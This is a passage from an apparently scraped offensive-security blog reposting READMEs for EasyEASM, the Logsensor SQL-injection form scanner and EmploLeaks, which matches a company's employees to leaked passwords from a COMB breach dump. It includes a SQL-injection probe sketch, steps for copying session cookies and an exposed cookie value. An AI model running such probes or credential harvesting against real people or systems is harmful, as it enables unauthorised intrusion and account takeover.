<h2 dir="auto" tabindex="-1">Demo Run</h2> <p dir="auto" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh4imPJseOE_CbEZat81jEK-yGdxBs0gQmyZ91ZjvUYH5FXEL_Ck7bdTaoPwvtyfe8iD4iODbFaelY5zl7HYQ4-eA9P63OHavFreKIrKaMy6REOAQN7l6INDckFe1M78Xdwqv1-tMwJ9S1QmytlL4qizh1jmIjDzetWpsntg98--R_01Vihkg_TJ1j6d2k5"><img alt="" border="0" height="238" id="BLOGGER_PHOTO_ID_7310068364822647714" src="https://blogger.googleusercontent.com/img/a/AVvXsEh4imPJseOE_CbEZat81jEK-yGdxBs0gQmyZ91ZjvUYH5FXEL_Ck7bdTaoPwvtyfe8iD4iODbFaelY5zl7HYQ4-eA9P63OHavFreKIrKaMy6REOAQN7l6INDckFe1M78Xdwqv1-tMwJ9S1QmytlL4qizh1jmIjDzetWpsntg98--R_01Vihkg_TJ1j6d2k5=w640-h238" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Disclaimer</h2> <p dir="auto">This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.</p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/n0mi1k/pmkidcracker" rel="nofollow" target="_blank" title="Download Pmkidcracker">Download Pmkidcracker</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-9317195825850379252024-02-18T15:30:00.000-08:002024-02-18T15:30:55.246-08:00EasyEASM - Zero-dollar Attack Surface Management Tool<article><div class="post-body entry-content" id="post-body-1574150313303608512" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiF0nbft8lV2IOQZsung9oQBKV132O2Os_dmSdH9V6k_eGUmAbv0HVDH6UctPeck97BFHLwCVD9cN09FbCdB5HUkpa_xmNNru2FhDGfG5j-jRqiwMVzthNERFowu0YPXs-4BylVTcq5HycF6cUsCltxQ68WNtA4iaN0XM16_zeKvhWMMs8GRJgI8Cgxkrfe"><img alt="" border="0" height="160" id="BLOGGER_PHOTO_ID_7310066350416498722" src="https://blogger.googleusercontent.com/img/a/AVvXsEiF0nbft8lV2IOQZsung9oQBKV132O2Os_dmSdH9V6k_eGUmAbv0HVDH6UctPeck97BFHLwCVD9cN09FbCdB5HUkpa_xmNNru2FhDGfG5j-jRqiwMVzthNERFowu0YPXs-4BylVTcq5HycF6cUsCltxQ68WNtA4iaN0XM16_zeKvhWMMs8GRJgI8Cgxkrfe=w640-h160" width="640" /></a></p><p style="text-align: center;"><br /></p><div> <p dir="auto">Zero-dollar attack surface management tool</p> <p dir="auto">featured at <a href="https://www.blackhat.com/us-23/arsenal/schedule/index.html#easy-easm---the-zero-dollar-attack-surface-management-tool-33645" rel="nofollow" target="_blank" title="Black Hat">Black Hat </a>Arsenal 2023 and <a href="https://reconvillage.org/recon-village-talks-2023-defcon-31/" rel="nofollow" target="_blank" title="Recon Village @ DEF CON 2023">Recon Village @ DEF CON 2023</a>.</p> </div> <h2 dir="auto" tabindex="-1">Description</h2> <p dir="auto">Easy EASM is just that... the easiest to set-up tool to give your organization visibility into its external facing assets.</p> <p dir="auto">The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. 
External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.</p> <p dir="auto">With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <div><pre><code>go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest</code></pre></div> <h2 dir="auto" tabindex="-1">Example config file</h2> <p dir="auto">The tool expects a configuration file named <code>config.yml</code> to be in the directory you are running from.</p> <p dir="auto">Here is an example of this yaml file:</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="# EasyEASM configurations runConfig: domains: # List root domains here. - example.com - mydomain.com slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications. discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications. runType: fast # Set to either fast (passive enum) or complete (active enumeration). 
activeWordList: subdomainWordlist.txt activeThreads: 100" dir="auto"><pre><code># EasyEASM configurations<br />runConfig:<br /> domains: # List root domains here.<br /> - example.com<br /> - mydomain.com<br /> slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.<br /> discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.<br /> runType: fast # Set to either fast (passive enum) or complete (active enumeration).<br /> activeWordList: subdomainWordlist.txt<br /> activeThreads: 100</code></pre></div> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">To run the tool, fill out the config file: <code>config.yml</code>. Then, run the <code>easyeasm</code> module:</p> <div><pre><code>./easyeasm</code></pre></div> <p dir="auto">After the run is complete, you should see the output CSV (<code>EasyEASM.csv</code>) in the run directory. This CSV can be added to your asset database and risk register!</p> <h2 dir="auto" tabindex="-1">Warranty</h2> <p dir="auto">The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.</p> <p dir="auto">The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.</p> <p dir="auto">The user assumes full responsibility for employing this tool and does so at their own peril. 
The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.</p> <p dir="auto">Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.</p> <p dir="auto">By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.</p> <h2 dir="auto" tabindex="-1">License</h2> <p dir="auto">This project is licensed under the MIT License - see the <a href="https://github.com/g0ldencybersec/EasyEASM/blob/main/LICENSE.md" rel="nofollow" target="_blank" title="LICENSE.md">LICENSE.md</a> for details.</p> <h2 dir="auto" tabindex="-1">Contact</h2> <p dir="auto">For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.</p> <ul dir="auto"> <li><a href="https://twitter.com/G0LDEN_infosec" rel="nofollow" target="_blank" title="Gunnar Andrews">Gunnar Andrews</a></li> <li><a href="https://oliviagallucci.com" rel="nofollow" target="_blank" title="Olivia Gallucci">Olivia Gallucci</a></li> <li><a href="https://twitter.com/Jhaddix" rel="nofollow" target="_blank" title="Jason Haddix">Jason Haddix</a></li> </ul> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/g0ldencybersec/EasyEASM" rel="nofollow" target="_blank" title="Download EasyEASM">Download EasyEASM</a></span></b></div>
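<p dir="auto">The Slack/Discord alerting described above boils down to a webhook POST with a small JSON payload. A minimal sketch using only the standard library — function names are illustrative, not EasyEASM's internals, and the Slack-style payload is an assumption (Discord accepts it when <code>/slack</code> is appended to the webhook URL):</p>

```python
import json
from urllib import request

def build_alert(new_assets):
    """Build a Slack-style webhook payload listing newly discovered assets."""
    lines = "\n".join(f"- {a}" for a in sorted(new_assets))
    return {"text": f"EasyEASM found {len(new_assets)} new asset(s):\n{lines}"}

def notify(webhook_url: str, new_assets):
    """POST the alert to the webhook; urlopen raises on a non-2xx response."""
    body = json.dumps(build_alert(new_assets)).encode()
    req = request.Request(webhook_url, data=body,
                          headers={"Content-Type": "application/json"})
    with request.urlopen(req) as resp:
        return resp.status
```

<p dir="auto">Diffing today's scan results against yesterday's asset list gives the <code>new_assets</code> set to report.</p>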
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-53074903581765807002024-02-18T15:27:00.000-08:002024-02-18T15:27:28.707-08:00Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning<article><div class="post-body entry-content" id="post-body-8889962215465828755" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjoZN1DjY08ldhMCl2NzF6UTNkhBZwqooryOK99tjMJbln1FzI-Q1cZv_xfKS8gOxg5bPPCj3U1lOtKJ9DnaG6yySxqp-Dru2wGJSXmZfxuZnSFST-f5rEsWsMAcb7o33th58nUG5d-3e1VJOR3Zi2_DHjvHOxlQQBpBZnOKvZIKpE6nHVyQ4ffqlrKVMFC"><img alt="" border="0" height="532" id="BLOGGER_PHOTO_ID_7310066164700791922" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoZN1DjY08ldhMCl2NzF6UTNkhBZwqooryOK99tjMJbln1FzI-Q1cZv_xfKS8gOxg5bPPCj3U1lOtKJ9DnaG6yySxqp-Dru2wGJSXmZfxuZnSFST-f5rEsWsMAcb7o33th58nUG5d-3e1VJOR3Zi2_DHjvHOxlQQBpBZnOKvZIKpE6nHVyQ4ffqlrKVMFC=w640-h532" width="640" /></a></p><p><br /></p> <p dir="auto">A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning</p> <p dir="auto"><strong>Features</strong></p> <ul dir="auto"> <li>Login panel scanning for multiple hosts</li> <li>Proxy compatibility (http, https)</li> <li>Login panel scanning is done with multiprocessing</li> </ul> <blockquote> <p dir="auto">so the script is super fast at scanning many URLs</p> </blockquote> <blockquote> <p dir="auto">quick tutorial & screenshots are shown at the bottom<br /> project contribution tips at the bottom</p></blockquote> <p dir="auto"><strong>Installation</strong></p> <div><pre><code>git clone https://github.com/Mr-Robert0/Logsensor.git<br />cd Logsensor && sudo chmod +x logsensor.py install.sh<br />pip install -r requirements.txt<br />./install.sh<br /><br /></code></pre></div> <blockquote> <p dir="auto">Dependencies</p> <ul dir="auto"> <li><a href="https://pypi.org/project/regex/" rel="nofollow" 
target="_blank" title="re">re</a></li> <li><a href="https://pypi.python.org/pypi/bs4" rel="nofollow" target="_blank" title="bs4">bs4</a></li> <li><a href="https://pypi.python.org/pypi/termcolor" rel="nofollow" target="_blank" title="termcolor">termcolor</a></li> <li><a href="https://pypi.python.org/pypi/argparse" rel="nofollow" target="_blank" title="argparse">argparse</a></li> <li><a href="https://pypi.python.org/pypi/tabulate/" rel="nofollow" target="_blank" title="tabulate">tabulate</a></li> <li><a href="https://pypi.python.org/pypi/requests/" rel="nofollow" target="_blank" title="requests">requests</a></li></ul></blockquote> <h3 dir="auto" tabindex="-1">Quick Tutorial</h3> <p dir="auto"><strong>1. Multiple hosts scanning to detect login panels</strong></p> <ul dir="auto"> <li>You can increase the threads (default 30)</li> <li>only run login detector module</li> </ul> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="python3 logsensor.py -f <subdomains-list> python3 logsensor.py -f <subdomains-list> -t 50 python3 logsensor.py -f <subdomains-list> --login" dir="auto"><pre><code>python3 logsensor.py -f <subdomains-list> <br />python3 logsensor.py -f <subdomains-list> -t 50<br />python3 logsensor.py -f <subdomains-list> --login</code></pre></div> <p dir="auto"><strong>2. 
Targeted SQLi form scanning</strong></p> <ul dir="auto"> <li>provide a specific login panel URL with the --sqli or -s flag to run only the SQLi form scanning module</li> <li>turn on the proxy to see the requests</li> <li>customize the username input name of the login panel (default "username")</li> </ul> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="python logsensor.py -u www.example.com/login --sqli python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080 python logsensor.py -u www.example.com/login -s --inputname email" dir="auto"><pre><code>python logsensor.py -u www.example.com/login --sqli <br />python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080<br />python logsensor.py -u www.example.com/login -s --inputname email</code></pre></div> <p dir="auto"><strong>View help</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="python logsensor.py --help usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads] optional arguments: -u , --url Target URL (e.g. http://example.com/ ) -f , --file Select a target hosts list file (e.g. list.txt ) --proxy Proxy (e.g. http://127.0.0.1:8080) -l, --login run only Login panel Detector Module -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email') -t , --threads Number of threads (default 30) -h, --help Show this help message and exit " dir="auto"><pre><code>python logsensor.py --help<br /><br />usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]<br /><br />optional arguments:<br /> -u , --url Target URL (e.g. 
http://example.com/ )<br /> -f , --file Select a target hosts list file (e.g. list.txt )<br /> --proxy Proxy (e.g. http://127.0.0.1:8080)<br /> -l, --login run only Login panel Detector Module<br /> -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls <br /> -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')<br /> -t , --threads Number of threads (default 30)<br /> -h, --help Show this help message and exit</code></pre></div> <h3 dir="auto" tabindex="-1">Screenshots</h3> <p dir="auto" style="text-align: center;"><a href="https://raw.githubusercontent.com/Mr-Robert0/Logsensor/main/Screenshots/1.png" rel="nofollow" target="_blank" title="A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning (11)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjoZN1DjY08ldhMCl2NzF6UTNkhBZwqooryOK99tjMJbln1FzI-Q1cZv_xfKS8gOxg5bPPCj3U1lOtKJ9DnaG6yySxqp-Dru2wGJSXmZfxuZnSFST-f5rEsWsMAcb7o33th58nUG5d-3e1VJOR3Zi2_DHjvHOxlQQBpBZnOKvZIKpE6nHVyQ4ffqlrKVMFC"><img alt="" border="0" height="532" id="BLOGGER_PHOTO_ID_7310066164700791922" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoZN1DjY08ldhMCl2NzF6UTNkhBZwqooryOK99tjMJbln1FzI-Q1cZv_xfKS8gOxg5bPPCj3U1lOtKJ9DnaG6yySxqp-Dru2wGJSXmZfxuZnSFST-f5rEsWsMAcb7o33th58nUG5d-3e1VJOR3Zi2_DHjvHOxlQQBpBZnOKvZIKpE6nHVyQ4ffqlrKVMFC=w640-h532" width="640" /></a> <a href="https://raw.githubusercontent.com/Mr-Robert0/Logsensor/main/Screenshots/2.png" rel="nofollow" target="_blank" title="A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning (12)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhhaFlcrTyOBXpb-mMPlh4dlTKuB5YnVC8XVlZy7Kw9GurkV5TmOX90EBiZh_DzV5OTeEHzDaLrF0P6WKuiM5z5iYGO6_5taQmqNxMvYAZNI1KG9Zl9dNzken41kUOJ8H7USqtTcUznTMFz84b6IS3oxKUI6OeKpMB5jP0lM0WX0GLTZotc4NbgSs0ls6HS"><img alt="" border="0" height="372" id="BLOGGER_PHOTO_ID_7310066183572724162" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEhhaFlcrTyOBXpb-mMPlh4dlTKuB5YnVC8XVlZy7Kw9GurkV5TmOX90EBiZh_DzV5OTeEHzDaLrF0P6WKuiM5z5iYGO6_5taQmqNxMvYAZNI1KG9Zl9dNzken41kUOJ8H7USqtTcUznTMFz84b6IS3oxKUI6OeKpMB5jP0lM0WX0GLTZotc4NbgSs0ls6HS=w640-h372" width="640" /></a></p><p dir="auto" style="text-align: center;"><br /></p> <h3 dir="auto" tabindex="-1">Development</h3> <p dir="auto"><strong>TODO</strong></p> <ol dir="auto"> <li>Add "POST form SQLi (time-based) scanning" and check for delays</li> <li>Fuzz URL paths so as not to miss any login panels</li></ol><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Mr-Robert0/Logsensor" rel="nofollow" target="_blank" title="Download Logsensor">Download Logsensor</a></span></b></div>
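<p dir="auto">The SQLi form scanning described above typically boils down to submitting a quote-bearing value in the login form's username input and checking the response for database error messages. The sketch below illustrates that error-based heuristic only; the function names and error-signature list are illustrative, not Logsensor's actual code:</p>

```python
# Illustrative sketch of error-based SQLi detection for a login form.
# The signature list and function names are hypothetical, not Logsensor's code.
SQL_ERROR_SIGNATURES = [
    "you have an error in your sql syntax",
    "warning: mysql",
    "unclosed quotation mark",
    "quoted string not properly terminated",
    "sqlite3.operationalerror",
]

def build_probe(username_field="username"):
    """Return POST data that injects a single quote into the username input."""
    return {username_field: "admin'", "password": "test"}

def looks_injectable(response_body):
    """Heuristic: a database error echoed back in the page suggests SQLi."""
    body = response_body.lower()
    return any(sig in body for sig in SQL_ERROR_SIGNATURES)
```

<p dir="auto">A real scanner would POST <code>build_probe()</code> to each discovered login panel (optionally through a proxy, as with <code>--proxy</code>) and run <code>looks_injectable()</code> on each response body.</p>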
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-33534405939761299452024-02-18T15:24:00.000-08:002024-02-18T15:24:25.802-08:00EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials<article><div class="post-body entry-content" id="post-body-7722379393350333081" itemprop="articleBody"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBT6948Ba32ZeXPBqet7BC9xMmzCuw6nQdnBsAHc6-LtTEGiN7PIQHQqAUKcQxwRncm0kSSq0Sis1TDy3klEvbeBPl4P5YQGfSB7D7DwwmJfnaM19AJRsGOke2qr1yFHq3BB4iprZByv3hObSGvblJSiDpmr5EtxEPV60tuOI-fSP79yr_eBUvfHDfKA86/s1792/EmploLeaks.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBT6948Ba32ZeXPBqet7BC9xMmzCuw6nQdnBsAHc6-LtTEGiN7PIQHQqAUKcQxwRncm0kSSq0Sis1TDy3klEvbeBPl4P5YQGfSB7D7DwwmJfnaM19AJRsGOke2qr1yFHq3BB4iprZByv3hObSGvblJSiDpmr5EtxEPV60tuOI-fSP79yr_eBUvfHDfKA86/w640-h366/EmploLeaks.png" width="640" /></a></div><p> </p> <p dir="auto">This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.</p> <h2 dir="auto" tabindex="-1">How it Works</h2> <p dir="auto">The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You can easily add your own database and connect to it through the tool.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <p dir="auto">To use this tool, you'll need to have Python 3.10 installed on your machine. 
Clone this repository to your local machine and install the required dependencies using pip in the <em>cli</em> folder:</p> <div><pre><code>cd cli<br />pip install -r requirements.txt<br /></code></pre></div> <h3 dir="auto" tabindex="-1">OSX</h3> <p dir="auto">We know that there is a problem when installing the tool due to the <em>psycopg2</em> binary. If you run into this problem, you can solve it by running:</p> <div><pre><code>cd cli<br />python3 -m pip install psycopg2-binary<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Basic Usage</h2> <p dir="auto">To use the tool, simply run the following command:</p> <p dir="auto">python3 cli/emploleaks.py</p> <p dir="auto">If everything went well during the installation, you will be able to start using EmploLeaks:</p> <div><pre><code>___________ .__ .__ __<br />\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______<br /> | __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/<br /> | \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \<br />/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ ><br /> \/ \/|__| \/ \/ \/ \/<br /><br />OSINT tool 🕵 to chain multiple apis<br />emploleaks><br /></code></pre></div> <p dir="auto">Right now, the tool supports two functionalities:</p> <ul dir="auto"> <li>LinkedIn, to search for all employees of a company and get their personal emails. <ul dir="auto"> <li>A GitLab extension, which is capable of finding the employees' personal code repositories.</li> </ul> </li> <li>If defined and connected, while the tool is gathering employee profiles, a search of the COMB database will be made in order to retrieve leaked passwords.</li> </ul> <h3 dir="auto" tabindex="-1">Retrieving Linkedin Profiles</h3> <p dir="auto">First, you must set the plugin to use, which in this case is <em>linkedin</em>. 
Afterwards, set your authentication tokens and then run the <em>impersonate</em> process:</p> <div><pre><code>emploleaks> use --plugin linkedin<br />emploleaks(linkedin)> setopt JSESSIONID<br />JSESSIONID: <br />[+] Updating value successfull<br />emploleaks(linkedin)> setopt li-at<br />li-at: <br />[+] Updating value successfull<br />emploleaks(linkedin)> show options<br />Module options:<br /><br />Name Current Setting Required Description<br />---------- ----------------------------------- ---------- -----------------------------------<br />hide yes no hide the JSESSIONID field<br />JSESSIONID ************************** no active cookie session in browser #1<br />li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1<br /> YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M<br /> cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI<br /> lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET<br /> kyCyfN58SNNH<br />emploleaks(linkedin)> run impersonate<br />[+] Using cookies from the browser<br />Setting for first time JSESSIONID<br />Setting for first time li_at<br /></code></pre></div> <p dir="auto">li_at and JSESSIONID are the authentication cookies of your LinkedIn session in the browser. You can use the Web Developer Tools to get them: sign in to LinkedIn normally, right-click the page and choose Inspect, and you will find those cookies in the Storage tab.</p> <p dir="auto">Now that the module is configured, you can run it and start gathering information from the company:</p> <div>Get Linkedin accounts + Leaked Passwords <p dir="auto">We created a custom <em>workflow</em>, where, with the information retrieved from LinkedIn, we try to match employees' personal emails to potential leaked passwords. 
In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the <em>connect</em> command, as shown below:</p> <div><pre><code>emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4<br />[+] Connecting to the Leak Database...<br />[*] version: PostgreSQL 12.15<br /></code></pre></div> <p dir="auto">Once it's connected, you can run the <em>workflow</em>. With all the users gathered, the tool will search the database to see whether a leaked credential affects anyone:</p> <div>In conclusion, the tool will generate console output with the following information: <ul dir="auto"> <li>A list of employees of the company (obtained from LinkedIn)</li> <li>The social network profiles associated with each employee (obtained from their email addresses)</li> <li>A list of leaked passwords associated with each email address.</li> </ul> <h2 dir="auto" tabindex="-1">How to build the indexed COMB database</h2> <p dir="auto">An important aspect of this project is the use of the indexed COMB database; to build your own version you need to <a href="https://github.com/infobyte/emploleaks/blob/main/comb.torrent" rel="nofollow" target="_blank" title="download the torrent first">download the torrent first</a>. 
Be careful: the downloaded files and the indexed version require at least 400 GB of available disk space.</p> <p dir="auto">Once the torrent has been completely downloaded you will get a folder structured as follows:</p> <div><pre><code>├── count_total.sh<br />├── data<br />│ ├── 0<br />│ ├── 1<br />│ │ ├── 0<br />│ │ ├── 1<br />│ │ ├── 2<br />│ │ ├── 3<br />│ │ ├── 4<br />│ │ ├── 5<br />│ │ ├── 6<br />│ │ ├── 7<br />│ │ ├── 8<br />│ │ ├── 9<br />│ │ ├── a<br />│ │ ├── b<br />│ │ ├── c<br />│ │ ├── d<br />│ │ ├── e<br />│ │ ├── f<br />│ │ ├── g<br />│ │ ├── h<br />│ │ ├── i<br />│ │ ├── j<br />│ │ ├── k<br />│ │ ├── l<br />│ │ ├── m<br />│ │ ├── n<br />│ │ ├── o<br />│ │ ├── p<br />│ │ ├── q<br />│ │ ├── r<br />│ │ ├── s<br />│ │ ├── symbols<br />│ │ ├── t<br /></code></pre></div> <p dir="auto">At this point, you can import all those files with the command <code>create_db</code>:</p> <div>The importer takes a long time, so we recommend running it with patience. <h2 dir="auto" tabindex="-1">Next Steps</h2> <p dir="auto">We are integrating other public sites and applications that may offer information about leaked credentials. We may not be able to see the plaintext password, but it will give insight into whether a user has any compromised credentials:</p> <ul dir="auto"> <li>Integration with Have I Been Pwned?</li> <li>Integration with Firefox Monitor</li> <li>Integration with Leak Check</li> <li>Integration with BreachAlarm</li> </ul> <p dir="auto">Also, we will be focusing on gathering even more information from public sources about every employee. Do you have any idea in mind? 
Don't hesitate to reach us:</p> <ul dir="auto"> <li>Javi Aguinaga: <a href="mailto:jaguinaga@faradaysec.com" rel="nofollow" target="_blank" title="jaguinaga@faradaysec.com">jaguinaga@faradaysec.com</a></li> <li>Gabi Franco: <a href="mailto:gabrielf@faradaysec.com" rel="nofollow" target="_blank" title="gabrielf@faradaysec.com">gabrielf@faradaysec.com</a></li> </ul> <p dir="auto">Or you can DM us at <a href="https://twitter.com/pastacls" rel="nofollow" target="_blank" title="@pastacls">@pastacls</a> or <a href="https://twitter.com/gaaabifranco" rel="nofollow" target="_blank" title="@gaaabifranco">@gaaabifranco</a> on Twitter.</p><p dir="auto"><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/infobyte/emploleaks" rel="nofollow" target="_blank" title="Download Emploleaks">Download Emploleaks</a></span></b></div></div></div></div>
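<p dir="auto">To illustrate how a COMB-style dump laid out as <code>data/&lt;first char&gt;/&lt;second char&gt;</code> files of <code>email:password</code> lines (the tree shown above) can be queried, here is a rough flat-file sketch. Note that EmploLeaks itself imports these files into a PostgreSQL database via <code>create_db</code> and queries that instead; the layout assumption and function name here are purely illustrative:</p>

```python
import os

def comb_lookup(email, comb_root="data"):
    """Look up an email in a COMB-style indexed dump laid out as
    data/<c1>/<c2> files containing 'email:password' lines.
    Layout assumed from the directory tree above; purely illustrative."""
    local = email.split("@", 1)[0].lower()
    c1 = local[0]
    c2 = local[1] if len(local) > 1 else "symbols"  # assumption for 1-char names
    path = os.path.join(comb_root, c1, c2)
    hits = []
    if os.path.isfile(path):
        with open(path, encoding="utf-8", errors="ignore") as fh:
            for line in fh:
                user, _, pwd = line.rstrip("\n").partition(":")
                if user.lower() == email.lower():
                    hits.append(pwd)
    return hits
```

<p dir="auto">The two-level index keeps each lookup to a single small file instead of scanning hundreds of gigabytes, which is the same reason the project indexes the dump before querying it.</p>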
</div>
</article>
<div class="hreview"><br /></div>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-19609023972385889082024-02-18T15:21:00.000-08:002024-02-18T15:21:32.091-08:00Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code<article><div class="post-body entry-content" id="post-body-1977661655175549716" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjsN98aVD0IQlyFYnA2iZMa3tvkC5PBLzzlAOm0EmaFLV1ERrUZBNRi46SriqB17KMhO2x0YCVC1RyoOfiluqaYH1BmOU3z0s1MEqBdW3q2Eyh0XwpxuUIsAev57lc5SHMRwgM2Fy0rHbNNpjixbIwBSsMSS8KsYysU_tMtUSyDEwABQxJnRovM6T94TyLl"><img alt="" border="0" height="368" id="BLOGGER_PHOTO_ID_7310038649922486290" src="https://blogger.googleusercontent.com/img/a/AVvXsEjsN98aVD0IQlyFYnA2iZMa3tvkC5PBLzzlAOm0EmaFLV1ERrUZBNRi46SriqB17KMhO2x0YCVC1RyoOfiluqaYH1BmOU3z0s1MEqBdW3q2Eyh0XwpxuUIsAev57lc5SHMRwgM2Fy0rHbNNpjixbIwBSsMSS8KsYysU_tMtUSyDEwABQxJnRovM6T94TyLl=w640-h368" width="640" /></a></p><p><br /></p> <p dir="auto">Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.</p> <span><a name="more"></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">What is <a href="https://www.mobb.ai" rel="nofollow" target="_blank" title="Mobb">Mobb</a>?</h2> <p dir="auto"><a href="https://www.mobb.ai" rel="nofollow" target="_blank" title="Mobb">Mobb</a> is the first vendor-agnostic automatic security vulnerability remediation tool. 
It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.</p> <h2 dir="auto" tabindex="-1">What does Bugsy do?</h2> <p dir="auto">Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).</p> <p dir="auto">Scan</p> <ul dir="auto"> <li>Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo</li> <li>Analyzes the vulnerability report to identify issues that can be remediated automatically</li> <li>Produces the code fixes and redirects the user to the fix report page on the Mobb platform</li> </ul> <p dir="auto">Analyze</p> <ul dir="auto"> <li>Analyzes a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically</li> <li>Produces the code fixes and redirects the user to the fix report page on the Mobb platform</li> </ul> <h2 dir="auto" tabindex="-1">Disclaimer</h2> <p 